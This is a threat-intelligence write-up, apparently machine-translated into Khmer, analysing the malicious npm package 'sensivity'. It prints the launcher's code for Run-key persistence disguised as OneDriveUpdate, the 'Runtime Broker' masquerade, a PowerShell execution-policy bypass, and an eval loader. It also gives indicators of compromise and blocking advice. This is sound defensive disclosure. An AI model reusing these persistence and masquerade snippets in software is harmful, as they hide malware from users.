TL; កុង
កញ្ចប់ npm ភាពរសើប វាពិពណ៌នាខ្លួនវាថាជា "ផ្ទាំងគ្រប់គ្រងភាពប្រែប្រួល"។ នៅលើ Windows វាដើរតួជាឧបករណ៍បញ្ជាពីចម្ងាយ និងជាឧបករណ៍ឃ្លាំមើល។
ចំណុចចូលរបស់វា, launcher.jsប្តូរឈ្មោះដំណើរការផ្ទាល់ខ្លួនរបស់វាទៅជា Runtime Broker សរសេរតម្លៃ Run-key ដែលចាប់ផ្តើមដោយស្វ័យប្រវត្តិដែលមានឈ្មោះថា OneDriveUpdate ដែលបើកដំណើរការកញ្ចប់ឡើងវិញតាមរយៈ VBScript ដែលលាក់ បង្កើត PowerShell ជាមួយ -ExecutionPolicy Bypassហើយបន្ទាប់មកវាយតម្លៃបន្ទុកម៉ាស៊ីនមេដែលមានទំហំ 171 KB ដែលបិទបាំង រួមជាមួយនឹងម៉ូឌុលដើមដែលមានទំហំ 6.87 MB sens.node.
វាបម្រើបន្ទះត្រួតពិនិត្យការភ្ជាប់ទូរស័ព្ទនៅលើច្រក TCP 3000 ហើយអាន URL របារអាសយដ្ឋានរបស់កម្មវិធីរុករកសកម្មតាមរយៈ Windows UIAutomation ដោយមើលវីដេអូ YouTube ដែលមានកូដរឹងមួយ។
ផ្នែកពីរដែលពីមុនអានថាទុកចោលជាប្រអប់ខ្មៅឥឡូវនេះត្រូវបានដោះស្រាយហើយ។ ម៉ាស៊ីនមេដែលបិទបាំង server.obf.js, ប្រើគ្រោងការណ៍អារេខ្សែអក្សរ obfuscator.io RC4; ការអនុវត្តឧបករណ៍ឌិកូដរបស់វាឡើងវិញក្រៅបណ្តាញ (គ្មានការប្រតិបត្តិ JavaScript) ស្តារចំណុចបញ្ចប់ខាងក្រៅតែមួយ — https://izopi.com/check.php — រួមជាមួយនឹងកូនសោសាធារណៈ RSA ដែលបានបង្កប់ ដែលប្រើដើម្បីផ្ទៀងផ្ទាត់ការឆ្លើយតបអាជ្ញាប័ណ្ណដែលបានចុះហត្ថលេខា។
ម៉ូឌុលដើម, sens.nodeមិនត្រូវបានខ្ចប់ទេ៖ តារាងនាំចូល និងខ្សែអក្សរដែលបានបង្កប់របស់វាកំណត់អត្តសញ្ញាណវាជា DirectX 11 / Dear ImGui ដែលផ្តល់នូវលក្ខណៈពិសេស aimbot, ESP (wall-hack) និង triggerbot ដែលជំរុញដោយការចាក់ដំណើរការពីចម្ងាយ និងការអាន/សរសេរអង្គចងចាំ។
ខ្សែអក្សរនៅខាងក្នុងវាយោងទៅលើអង្គភាពយានយន្ត និងទីតាំងផែនទីដែលស្របនឹង GTA V / FiveM។ កញ្ចប់ npm គឺជាកញ្ចប់រុំព័ទ្ធការចែកចាយ និងការតស៊ូជុំវិញម៉ូឌុលដើមនោះ។
សញ្ញាកំណត់គឺដំណើរការ មិនមែនបច្ចេកទេសទេ៖ អ្នកបោះពុម្ពផ្សាយអនាមិកតែមួយបានចេញផ្សាយប្រហែលចិតសិបកំណែនៃកញ្ចប់មួយ — 2.5.0 ឆ្លងកាត់ 2.5.69 ។ — ក្នុងរយៈពេលពីរបីថ្ងៃ ដោយម្នាក់ៗកាន់ឧបករណ៍បាញ់ដូចគ្នា។
គ្មានការដំឡើងទេ hooksបន្ទុកផ្ទុកទិន្នន័យដំណើរការតែនៅពេលដែលកញ្ចប់ត្រូវបានចាប់ផ្តើមប៉ុណ្ណោះ។
ការវាយប្រហារ៖ របៀបដែលវាដំណើរការ
sensivity ដឹកជញ្ជូនឯកសារចំនួនដប់។ package.json មានតិចតួចណាស់៖ គ្មានវាលឃ្លាំង គ្មានអាជ្ញាប័ណ្ណ ឈ្មោះក្លែងក្លាយមេ និងឈ្មោះក្លែងក្លាយប៊ីនពីរ (sensivity, sens) ដែលចង្អុលទៅ launcher.js និងស្គ្រីបចាប់ផ្តើមរបស់ node launcher.js។ មិនមានការដំឡើងក្រោយ ឬការដំឡើងជាមុនទេ។ គ្មានអ្វីដំណើរការលើការដំឡើង npm ទេ។ ឥរិយាបថដែលបានពិពណ៌នាខាងក្រោមដំណើរការនៅពេលដែលអ្នកប្រើប្រាស់ចាប់ផ្តើមកញ្ចប់ — តាមរយៈ bin shim ស្គ្រីបចាប់ផ្តើម ឬតម្រូវការ។
tarball មាន launcher ម៉ាស៊ីនមេដែលបិទបាំង ម៉ូឌុលដើម ស្គ្រីប Visual Basic និងថតឯកសារ public/web សម្រាប់ផ្ទាំងបញ្ជា។ launcher.js គឺជាកម្មវិធីរៀបចំដែលអាចអានបាន។ តក្កវិជ្ជាដែលសំខាន់នៅពេលដំណើរការស្ថិតនៅក្នុង blobs ពីរដែលវាផ្ទុក — ម៉ាស៊ីនមេដែលបិទបាំង និងម៉ូឌុលដើមដែលបានចងក្រង ដែលទាំងពីរត្រូវបានដោះស្រាយខាងក្រោម។
ការក្លែងបន្លំដំណើរការ និងកម្មវិធីធ្វើបច្ចុប្បន្នភាព OneDrive ក្លែងក្លាយ
នៅដើមដំបូងនៃដំណើរការ launcher.js កំណត់ឈ្មោះដំណើរការផ្ទាល់ខ្លួនរបស់វាពីរដង៖
javascript process.title = 'Runtime Broker'; Runtime Broker គឺជាដំណើរការ Windows ស្របច្បាប់ (RuntimeBroker.exe) ដែលសម្របសម្រួលការអនុញ្ញាតកម្មវិធី។ ការប្តូរឈ្មោះដំណើរការ Node ឱ្យត្រូវគ្នានឹងវាមានន័យថា ការក្រឡេកមើល Task Manager យ៉ាងរហ័សមិនបង្ហាញអ្វីចម្លែកនោះទេ។
ភាពស្ថិតស្ថេរត្រូវបានសរសេរតាមរយៈ PowerShell ជាជាង API ចុះបញ្ជីដោយផ្ទាល់៖
javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); តម្លៃចាប់ផ្ដើមដោយស្វ័យប្រវត្តិមានឈ្មោះថា OneDriveUpdate ហើយវាមិនចង្អុលទៅកញ្ចប់ដោយផ្ទាល់ទេ។ វាចង្អុលទៅ wscript.exe ដែលដំណើរការ OneDrive.Standalone.Updater.vbs ដែលបានភ្ជាប់មកជាកញ្ចប់។ ស្គ្រីបនោះបើកដំណើរការ node launcher.js ឡើងវិញនៅក្នុងបង្អួចដែលលាក់។ ទាំងឈ្មោះ Run-key និងឈ្មោះឯកសារ VBScript ខ្ចីម៉ាកយីហោ Microsoft ដូច្នេះធាតុចាប់ផ្ដើមដោយស្វ័យប្រវត្តិត្រូវបានអានជាកិច្ចការ OneDrive ធម្មតា។
PowerShell ជាមួយនឹងការរំលងគោលការណ៍ប្រតិបត្តិ
កម្មវិធីបើកដំណើរការ (launcher) បញ្ចេញទៅ PowerShell ម្តងហើយម្តងទៀត។ ចំណុចសំខាន់ដែលម៉ាស៊ីនស្កេនសម្គាល់ថាសំខាន់គឺការបើកដំណើរការ .ps1 ដែលបានបង្កើតជាមួយនឹងគោលការណ៍ប្រតិបត្តិដែលត្រូវបានបិទ៖
javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); ការរំលងគោលការណ៍ប្រតិបត្តិលុបការត្រួតពិនិត្យការចុះហត្ថលេខាលើស្គ្រីបក្នុងស្រុកសម្រាប់ការអំពាវនាវនោះ។ ស្គ្រីបដែលបានបង្កើតដោះស្រាយការងារឃ្លាំមើលកម្មវិធីរុករក និងការរកឃើញបង្អួចដែលបានពិពណ៌នានៅក្នុងផ្នែកបន្ទាប់។
ម៉ាស៊ីនមេដែលបិទបាំង និងម៉ូឌុលដើម
បន្ទាប់ពីការដំឡើងរួច launcher.js ផ្ទុក និងប្រតិបត្តិ payload ពិតប្រាកដរបស់វា៖
const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8')); server.obf.js មានទំហំ 171 KB នៃ _0x-array obfuscation — លំនាំ JavaScript ដែលខ្សែអក្សរ និងឧបករណ៍កំណត់អត្តសញ្ញាណនីមួយៗត្រូវបានជំនួសដោយលិបិក្រមទៅជាអារេដែលបានសាប់ បន្ទាប់មកដកឯកសារយោងនៅពេលដំណើរការ។ គ្រោងការណ៍នេះគឺជាវ៉ារ្យ៉ង់ RC4 ដែលផលិតដោយ obfuscator.io៖ មុខងារឌិកូដតែមួយ base64 ឌិកូដធាតុអារេ ហើយបន្ទាប់មក RC4 ឌិគ្រីបវាជាមួយកូនសោក្នុងមួយការហៅ។ ការអនុវត្តឌិកូដនោះឡើងវិញនៅក្នុងស្គ្រីបដាច់ដោយឡែក — ដំណើរការតែការអនុវត្តឡើងវិញលើអារេខ្សែអក្សរ 821 ដែលបានស្រង់ចេញ មិនមែន JavaScript របស់កញ្ចប់ទេ — ធ្វើឱ្យវាស្អាត។ អ្វីដែលលេចចេញមកគឺតិចតួច ប៉ុន្តែ decisive: URL ខាងក្រៅមួយ https://izopi.com/check.php` ត្រូវបានកំណត់ទៅ LICENSE_URL ថេរ; RSA PUBLIC_KEY_PEM ដែលបានបង្កប់`; បន្ទះក្នុងស្រុកបញ្ជូន /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off និង /trigger/status; និងខ្សែអក្សរ child_process, crypto និង [Sensivity] sens.node ត្រូវបានផ្ទុក — ខ្សែអក្សរចុងក្រោយគឺជាបន្ទាត់កំណត់ហេតុពិតប្រាកដដែលកម្មវិធីបើកដំណើរការសរសេរឡើងវិញទៅកាន់ម៉ូឌុលកម្មវិធី។ ចំណុចបញ្ចប់គឺជាការត្រួតពិនិត្យអាជ្ញាប័ណ្ណ៖ អតិថិជនបង្ហោះឧបករណ៍កំណត់អត្តសញ្ញាណ (ម៉ាស៊ីនមេដែលបិទបាំងធ្វើទ្រង់ទ្រាយលេខសម្គាល់ Discord៖ ខ្សែអក្សរ %s) ហើយសោ RSA ផ្ទៀងផ្ទាត់ការឆ្លើយតបដែលបានចុះហត្ថលេខារបស់ម៉ាស៊ីនមេ។
sens.node គឺជាកម្មវិធីបន្ថែមដើមដែលបានចងក្រងទំហំ 6.87 MB ហើយវាមិនត្រូវបានខ្ចប់ទេ — អង់ត្រូពីផ្នែកស្ថិតនៅចន្លោះ 5.6–6.6 ហើយតារាងនាំចូល និងនាំចេញ PE គឺនៅដដែល ដូច្នេះសមត្ថភាពរបស់វាអាចអានបានដោយផ្ទាល់។ វានាំចេញ napi_register_module_v1 standard ចំណុចចូល N-API របស់ Node ដូច្នេះម៉ាស៊ីនមេដែលបានវាយតម្លៃផ្ទុកវាជាមួយនឹងតម្រូវការធម្មតា។ តារាងនាំចូលរបស់វាគឺប្រាប់។ ពី KERNEL32 វាទាញយក OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules និង Process32First/NextW — សំណុំស្តង់ដារសម្រាប់កំណត់ទីតាំងដំណើរការផ្សេងទៀត ការបែងចែកអង្គចងចាំនៅខាងក្នុងវា និងការអាន ឬសរសេរអង្គចងចាំនោះ។ ពី USER32 វាទាញយក GetAsyncKeyState, GetKeyState, mouse_event និង SetCursorPos; វាភ្ជាប់ d3d11.dll, D3DCOMPILER_43 និង dwmapi សម្រាប់ការដាក់លើអេក្រង់ និងសំណុំ WINHTTP ពេញលេញសម្រាប់ការហៅទូរស័ព្ទបណ្តាញ។ ខ្សែអក្សរដែលបានបង្កប់របស់វាដាក់ឈ្មោះសំណុំលក្ខណៈពិសេសដោយគ្មានភាពមិនច្បាស់លាស់៖ Enable Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected និងបដា Dear ImGui Dear ImGui 1.91.3 WIP។ ខ្សែអក្សរទីតាំង និងអង្គភាពដូចជា Grapeseed Medical Clinic និងវាក្យសព្ទ vehicle-ESP គឺស្របនឹង GTA V / FiveM។
ការបំបែកនេះត្រូវបានធ្វើឡើងដោយចេតនា៖ launcher.js ដែលអាចអានបានមានតែផ្នែកដែលម៉ាស៊ីនស្កេនអានបានយ៉ាងងាយស្រួល - persistence, masquerade, eval call ខ្លួនវា - ខណៈពេលដែល obfuscation លាក់ទំនាក់ទំនង runtime របស់ម៉ាស៊ីនខាងក្រៅមួយ ហើយប្រព័ន្ធគោលពីរមានតក្កវិជ្ជា game-overlay និង process-injection។ launcher គឺជា shell ស្តើង និងអាចធ្វើសវនកម្មបាន។ ម៉ាស៊ីនមេ obfuscated លាក់អត្តសញ្ញាណបណ្តាញ។ ម៉ូឌុលដើមគឺជា payload។ យើងពិពណ៌នាអំពីការនាំចូល និង strings របស់ប្រព័ន្ធគោលពីរថាជា read; យើងមិនសន្និដ្ឋានគោលបំណងរបស់ប្រតិបត្តិករពីពួកវាទេ។
បន្ទះត្រួតពិនិត្យការផ្គូផ្គងទូរស័ព្ទនៅលើច្រក 3000
កម្មវិធីបើកដំណើរការគ្រប់គ្រងម៉ាស៊ីនបម្រើបណ្ដាញក្នុងស្រុកនៅលើច្រក TCP 3000 ហើយចាត់ទុកវាជា singleton។ វាសាកសួររកអ្នកស្តាប់ដែលមានស្រាប់ ហើយលុបវាមុនពេលភ្ជាប់៖
javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); បន្ទះនេះអាចចូលមើលបាននៅ http://localhost:3000 ជាមួយនឹង URL បម្រុងទុក LAN ដែលបានអ៊ិនកូដយ៉ាងរឹងមាំនៃ http://192.168.1.16:3000។ ថតឯកសារ public/ និងឥរិយាបថរបស់បន្ទះគឺស្របនឹងលំហូរភ្ជាប់ QR៖ ទូរស័ព្ទស្កេនលេខកូដ ហើយភ្ជាប់ទៅម៉ាស៊ីនជាឧបករណ៍បញ្ជាពីចម្ងាយ។ គ្មានដែនបញ្ជា និងត្រួតពិនិត្យខាងក្រៅលេចឡើងជាអត្ថបទច្បាស់លាស់នៅក្នុងកម្មវិធីបើកដំណើរការទេ — ប៉ុន្តែ ដូចដែលការបំបាត់ការភាន់ច្រឡំខាងលើបង្ហាញ មានដែនមួយមានវត្តមាននៅក្នុងម៉ាស៊ីនមេដែលភាន់ច្រឡំ៖ ចំណុចបញ្ចប់អាជ្ញាប័ណ្ណ izopi.com។ បន្ទះខ្លួនវាគឺជាមូលដ្ឋាន និងមានវិសាលភាព LAN; ម៉ាស៊ីនចេញតែមួយគត់គឺការត្រួតពិនិត្យអាជ្ញាប័ណ្ណនោះ។
គំរូអ្នកគ្រប់គ្រង/កម្មករដែលបានផ្ដាច់ចេញពីគ្នារក្សាដំណើរការឲ្យនៅរស់។ កម្មវិធីចាប់ផ្ដើមបង្កើតខ្លួនវាឡើងវិញជាមួយនឹងទង់បរិស្ថាន SENSIVITY_SUPERVISOR និង SENSIVITY_WORKER ដោយកូននីមួយៗកំពុងដំណើរការត្រូវបានលាក់ ដូច្នេះការសម្លាប់ដំណើរការមួយទុកឲ្យមានអ្នកឃ្លាំមើលចាប់ផ្ដើមវាឡើងវិញ។
ការឃ្លាំមើលកម្មវិធីរុករកតាមអ៊ីនធឺណិត និងសញ្ញា YouTube
ឥរិយាបថជាក់លាក់បំផុតគឺការត្រួតពិនិត្យកម្មវិធីរុករក។ launcher.js បង្កើត PowerShell ដែលជំរុញ Windows UIAutomation ឱ្យអានរបារអាសយដ្ឋានរបស់កម្មវិធីរុករកដែលកំពុងដំណើរការ៖
javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', ValuePattern ប្រគល់ខ្លឹមសារអត្ថបទនៃធាតុ UI។ ដោយអនុវត្តទៅការគ្រប់គ្រងការកែសម្រួលរបារអាសយដ្ឋានរបស់កម្មវិធីរុករក វាប្រគល់ URL ដែលជនរងគ្រោះកំពុងមើល — ដោយគ្មានផ្នែកបន្ថែមកម្មវិធីរុករក ដោយមិនប៉ះប្រវត្តិរូបនៅលើថាស និងដោយគ្មានទំពក់ API។ ស្គ្រីបដែលបានបង្កើតធ្វើម្តងទៀតនូវបញ្ជី $browserNames ហើយស្រង់ URL ឬចំណងជើងបង្អួចនៃកម្មវិធីរុករកណាមួយនៅខាងមុខ។
URL នោះត្រូវបានសាកល្បងប្រឆាំងនឹងគោលដៅដែលបានអ៊ិនកូដរឹងតែមួយ៖
javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; កម្មវិធីបើកដំណើរការនឹងធ្វើការស្ទង់មតិលើរង្វិលជុំរយៈពេលបីវិនាទីសម្រាប់បង្អួចកម្មវិធីរុករកដែលបង្ហាញ YouTube ហើយ PowerShell ដែលបានបង្កើតមានគូ Get-YouTubeBrowser / Test-TargetYouTubeUrl ដែលត្រូវគ្នានឹងលេខសម្គាល់វីដេអូនោះ។ ឥទ្ធិពលដែលអាចសង្កេតឃើញមានពីរយ៉ាង៖ URL រុករកសកម្មត្រូវបានអានចេញពីអេក្រង់របស់ជនរងគ្រោះ ហើយអន្តរកម្មរបស់ម៉ាស៊ីនជាមួយវីដេអូ YouTube ជាក់លាក់មួយត្រូវបានរកឃើញ។ យើងពិពណ៌នាអំពីយន្តការ និងគោលដៅ។ យើងមិនសន្និដ្ឋានពីហេតុផលពីពួកវាទេ។
ការអានរបារអាសយដ្ឋានគឺជាអ្វីដែលម៉ាស៊ីនស្កេនដាក់ស្លាកថា sensitive_data_enumeration — ប្រភព Process::env និង UIAutomation ដែលផ្តល់ពេលវេលាដំណើរការដែលមានសមត្ថភាពបណ្តាញ។ វាមើលទៅមិនបង្កគ្រោះថ្នាក់នៅពេលដាច់ដោយឡែក ហើយដោះស្រាយបានតែចំពោះការឃ្លាំមើលនៅពេលដែលវដ្តជីវិតទិន្នន័យត្រូវបានតាមដានពីប្រភព UIAutomation ទៅម៉ាស៊ីនមេដែលមិនច្បាស់លាស់។
ពេលវេលា និងការវិវត្តន៍នៃកំណែ
ភាពរសើបមិនមែនជាការផ្ទុកឡើងតែម្តងនោះទេ។ គណនីអ្នកបោះពុម្ពផ្សាយមានកំណែដែលបានបោះពុម្ពផ្សាយប្រហែលចិតសិបនៃកញ្ចប់តែមួយនេះ ហើយកំណែថ្មីៗនៅតែបន្តមកដល់ក្នុងអំឡុងពេលពិនិត្យឡើងវិញ។ កម្មវិធីបើកដំណើរការពង្រីកលក្ខណៈពិសេសម្តងមួយៗនៅទូទាំងខ្សែ 2.5.x ខណៈពេលដែលភាពស្ថិតស្ថេរ និងការផ្ទុកបន្ទុករបស់វានៅតែថេរ។
| កាលបរិច្ឆេទ (UTC) | កំណែដែលបានសង្កេតឃើញ | ស្ថានភាពកម្មវិធីចាប់ផ្ដើម |
|---|---|---|
| 2026-06-02 | 2.5.8 - 2.5.46 (25) | កម្មវិធីបើកដំណើរការបន្ទះ QR មូលដ្ឋាន; ភាពស្ថិតស្ថេរនៃគ្រាប់ចុចរត់; ការវាយតម្លៃម៉ាស៊ីនមេដែលត្រូវបានបិទបាំង។ |
| 2026-06-03 | 2.5.53 - 2.5.61 (6) | ស្នាមម្រាមដៃដូចគ្នា; ការបង្ក្រាបដានកុងសូល។ |
| 2026-06-04 | 2.5.67, 2.5.68 (2) | បន្ថែមគោលដៅចូលរួម YouTube ដែលបានខ្ទាស់ wJWta2lO0Lw. |
| 2026-06-05 | 2.5.0 - 2.5.69 (24) | ការបំពេញចន្លោះប្រហោង បោះពុម្ពផ្សាយឡើងវិញនៅទូទាំងជួរផលិតផល; អ្នកត្រួតពិនិត្យ/អ្នកឃ្លាំមើលកម្មករ។ |
ការអានកម្មវិធីបើកដំណើរការនៅទូទាំងតំណាងដែលបានទាញយក — 2.5.0, 2.5.36 និង 2.5.69 — បង្ហាញបួនកម្រិត។ ការបង្កើតដំបូងបំផុតមានកម្មវិធីបើកដំណើរការផ្គូផ្គង QR មូលដ្ឋាន។ ចាប់ពី 2.5.33 ឧបករណ៍ប្រមូលផលរបារអាសយដ្ឋាន UIAutomation លេចឡើង។ ចាប់ពី 2.5.58 ស្រទាប់គ្រប់គ្រងអ្នកត្រួតពិនិត្យត្រូវបានបន្ថែម។ ចាប់ពី 2.5.64 អ្នកត្រួតពិនិត្យ/អ្នកឃ្លាំមើលកម្មករដែលបានផ្ដាច់ចេញបំពេញសំណុំ។ ពេញមួយរឿង មានរឿងបួនដែលមិនដែលផ្លាស់ប្តូរ៖ កូនសោ OneDriveUpdate Run, ដំណក់ OneDrive.Standalone.Updater.vbs, eval'd server.obf.js និងម៉ូឌុលដើម sens.node។
រលកថ្ងៃទី 05 ខែមិថុនា ឆ្នាំ 2026 គឺគួរឱ្យកត់សម្គាល់ ពីព្រោះវាបានបោះពុម្ពឡើងវិញនូវលេខកំណែទាប — 2.5.0 ដល់ 2.5.15 — ដែលស្ថិតនៅក្រោមកំណែដែលបានបញ្ជាក់កាលពីប៉ុន្មានថ្ងៃមុន។ ឥទ្ធិពលគឺជាបន្ទាត់ 2.5.x ដែលជាប់គ្នានៅលើបញ្ជីឈ្មោះ ដែលកំណែនីមួយៗមានកម្មវិធីបើកដំណើរការដូចគ្នា។
សូចនាករនៃការសម្របសម្រួល
សូចនាករទាំងអស់ខាងក្រោមត្រូវបានអានដោយផ្ទាល់ពីកញ្ចប់ tarball។ កម្មវិធីបើកដំណើរការដែលអាចអានបានមានតែរង្វិលជុំត្រឡប់មកវិញ និងអាសយដ្ឋាន LAN ឯកជនតែមួយប៉ុណ្ណោះ។ ឈ្មោះម៉ាស៊ីនខាងក្រៅតែមួយគឺ izopi.com ត្រូវបានសង្គ្រោះដោយការ deobfuscating server.obf.js ក្រៅបណ្តាញ។
| វាយបញ្ចូល | ទ្រនិចបង្ហាញ | ភក្ដិកំណត់ត្រាកំណត់ |
|---|---|---|
| កញ្ចប់សមាជិក | npm:sensivity (≈៧០ កំណែ, 2.5.0-2.5.69) | អ្នកបោះពុម្ពផ្សាយកញ្ចប់តែមួយ; គ្មានឃ្លាំង; គ្មានអាជ្ញាប័ណ្ណ។ |
| ឯកសារ | launcher.js | ឧបករណ៍រៀបចំដែលអាចអានបាន; គោលដៅមេ និងធុងសំរាម។ |
| ឯកសារ | server.obf.js (≈១៧១ គីឡូបៃ) | obfuscator.io RC4 string-array payload ដែលផ្ទុកតាមរយៈ eval(fs.readFileSync(...)). |
| ឯកសារ | sens.node (≈៦.៨៧ មេកាបៃ) | កម្មវិធីបន្ថែម N-API សម្រាប់ Node PE32+ x86-64; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40. |
| ឯកសារ | OneDrive.Standalone.Updater.vbs | កម្មវិធីបើកដំណើរការឡើងវិញដែលលាក់ (node launcher.js). |
| Network | https://izopi.com/check.php | ចំណុចបញ្ចប់អាជ្ញាប័ណ្ណ/ការអនុញ្ញាតត្រូវបានសង្គ្រោះពីម៉ាស៊ីនមេដែលលាក់បាំង; កូនសោសាធារណៈ RSA ដែលបានបង្កប់ផ្ទៀងផ្ទាត់ការឆ្លើយតប។ |
| សមត្ថភាព | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread | ការចាក់ដំណើរការពីចម្ងាយ និងសមត្ថភាពអាន/សរសេរអង្គចងចាំ។ |
| សមត្ថភាព | Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP | DirectX 11 / ImGui game overlay ដែលអនុវត្តមុខងារ aimbot, ESP និង triggerbot។ |
| ចុះបញ្ជី | HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate | តម្លៃចាប់ផ្តើមដោយស្វ័យប្រវត្តិចង្អុលទៅ wscript.exe និងកម្មវិធីបើកដំណើរការ VBScript។ |
| ដំណើរការ | process.title = 'Runtime Broker' | ក្លែងបន្លំជាដំណើរការ Windows Runtime Broker ស្របច្បាប់។ |
| ឥរិយាបថ | powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 | ការរំលងគោលការណ៍ប្រតិបត្តិដែលប្រើសម្រាប់ស្គ្រីប PowerShell ដែលបានបង្កើត។ |
| ឥរិយាបថ | UIAutomation ValuePattern អានរបារអាសយដ្ឋានកម្មវិធីរុករក | អាន URL នៃបង្អួចកម្មវិធីរុករកផ្ទៃខាងមុខ។ |
| ឥរិយាបថ | លេខសម្គាល់វីដេអូគោលដៅ wJWta2lO0Lwការស្ទង់មតិ YouTube រយៈពេល 3 វិនាទី | សញ្ញាត្រួតពិនិត្យការចូលរួមដែលបានខ្ទាស់។ |
| Network | http://localhost:3000, បម្រុង http://192.168.1.16:3000 | ផ្ទាំងបញ្ជាផ្គូផ្គង QR ត្រូវបានបង្ហាញនៅក្នុងមូលដ្ឋាន និងនៅលើ LAN។ |
| បរិស្ថាន | SENSIVITY_SUPERVISOR, SENSIVITY_WORKER | ទង់សម្របសម្រួលដំណើរការឃ្លាំមើលដែលបានផ្ដាច់ចេញ។ |
ការសន្មត់ ផលប៉ះពាល់ និងអ្នកការពារ
កញ្ចប់នេះត្រូវបានបោះពុម្ពផ្សាយដោយគណនី npm តែមួយដែលអ៊ីមែលដែលបានបញ្ជាក់គឺជាអាសយដ្ឋាន Gmail ដែលមិនទាន់បានផ្ទៀងផ្ទាត់។ គណនីនេះមានពិន្ទុកេរ្តិ៍ឈ្មោះចុះបញ្ជីអវិជ្ជមានយ៉ាងខ្លាំង រក្សា និងបោះពុម្ពផ្សាយតែកញ្ចប់មួយនេះប៉ុណ្ណោះ ហើយមិនមានឃ្លាំងប្រភពដែលភ្ជាប់ទេ។ យើងមិនទាន់បានផ្ទៀងផ្ទាត់ភាពជាម្ចាស់នៃអ៊ីមែលនោះទេ ហើយយើងសន្មតយុទ្ធនាការនេះទៅគណនីអ្នកបោះពុម្ពផ្សាយ មិនមែនទៅបុគ្គលណាម្នាក់ដែលមានឈ្មោះនោះទេ។ កម្មវិធីបើកដំណើរការមិនមានហេដ្ឋារចនាសម្ព័ន្ធអត្ថបទច្បាស់លាស់ទេ ប៉ុន្តែម៉ាស៊ីនខាងក្រៅតែមួយឥឡូវនេះត្រូវបានគេស្គាល់៖ ម៉ាស៊ីនមេដែលបិទបាំងទាក់ទង izopi.com សម្រាប់ការត្រួតពិនិត្យអាជ្ញាប័ណ្ណ ហើយម៉ូឌុលដើម — អានពីតារាងនាំចូល និងខ្សែអក្សររបស់វាជាជាងបញ្ច្រាសការណែនាំដោយការណែនាំ — គឺជាការដាក់ហ្គេមដែលចាក់ចូលទៅក្នុង និងអានអង្គចងចាំនៃដំណើរការផ្សេងទៀត។
ផលប៉ះពាល់ដែលអាចសង្កេតឃើញគឺធ្លាក់ទៅលើអ្នកប្រើប្រាស់ Windows ដែលដំឡើង និងដំណើរការភាពរសើបដោយរំពឹងថានឹងមានឧបករណ៍ប្រើប្រាស់ផ្ទាំងបញ្ជា។ នៅលើម៉ាស៊ីនទាំងនោះ កញ្ចប់នេះបង្កើតភាពស្ថិតស្ថេរចាប់ផ្តើមដោយស្វ័យប្រវត្តិដែលក្លែងបន្លំជាភារកិច្ច OneDrive ប្តូរឈ្មោះខ្លួនវាដើម្បីធ្វើត្រាប់តាមដំណើរការប្រព័ន្ធ អាន URL នៃអ្វីដែលអ្នកប្រើប្រាស់កំពុងរុករក និងបង្កើតបន្ទះភ្ជាប់ដែលភ្ជាប់ម៉ាស៊ីនទៅឧបករណ៍បញ្ជាពីចម្ងាយតាមរយៈបណ្តាញក្នុងស្រុក។ អ្នកត្រួតពិនិត្យ/អ្នកឃ្លាំមើលកម្មករមានន័យថា ការសម្លាប់ដំណើរការតែមួយមិនលុបវាចេញទេ។ ធាតុ Run-key នឹងនៅរស់រានមានជីវិតបន្ទាប់ពីចាប់ផ្ដើមឡើងវិញ។ macOS និង Linux មិនត្រូវបានកំណត់គោលដៅដោយកម្មវិធីបើកដំណើរការទេ — ផ្លូវភាពស្ថិតស្ថេរ PowerShell និង UIAutomation គឺសម្រាប់តែ Windows ប៉ុណ្ណោះ។
ការបិទដំណើរការកំណែចិតសិបគឺជានិន្នាការដែលគួរឲ្យកត់សម្គាល់។ ការបោះពុម្ពឡើងវិញនូវកញ្ចប់មួយរាប់សិបដងក្នុងរយៈពេលពីរបីថ្ងៃ រួមទាំងការបំពេញលេខកំណែនៅខាងក្រោមលេខកំណែដែលត្រូវបានដកចេញរួចហើយ រក្សាច្បាប់ចម្លងបន្តនៅលើបញ្ជីឈ្មោះរវាងការដកចេញ និងធ្វើឱ្យខកចិត្តចំពោះបញ្ជីរារាំងដែលបានខ្ទាស់ដោយកំណែ។ ធាតុបញ្ជីរារាំងសម្រាប់ sensivity@2.5.61 មិនមានអ្វីប្រឆាំងនឹង sensivity@2.5.3 ដែលបានបោះពុម្ពឡើងវិញនៅថ្ងៃបន្ទាប់ទេ។
អ្នកការពារអាចធ្វើសកម្មភាពលើចំណុចខាងក្រោម៖
- រារាំងភាពរសើបនៃឈ្មោះកញ្ចប់ទាំងស្រុងនៅក្នុងបញ្ជីអនុញ្ញាតប្រូកស៊ីចុះបញ្ជី និង CI។ ការខ្ទាស់កំណែនីមួយៗបាត់បង់ចង្វាក់នៃការបោះពុម្ពផ្សាយឡើងវិញ។ ឈ្មោះគឺជាសូចនាករប្រើប្រាស់បានយូរ។
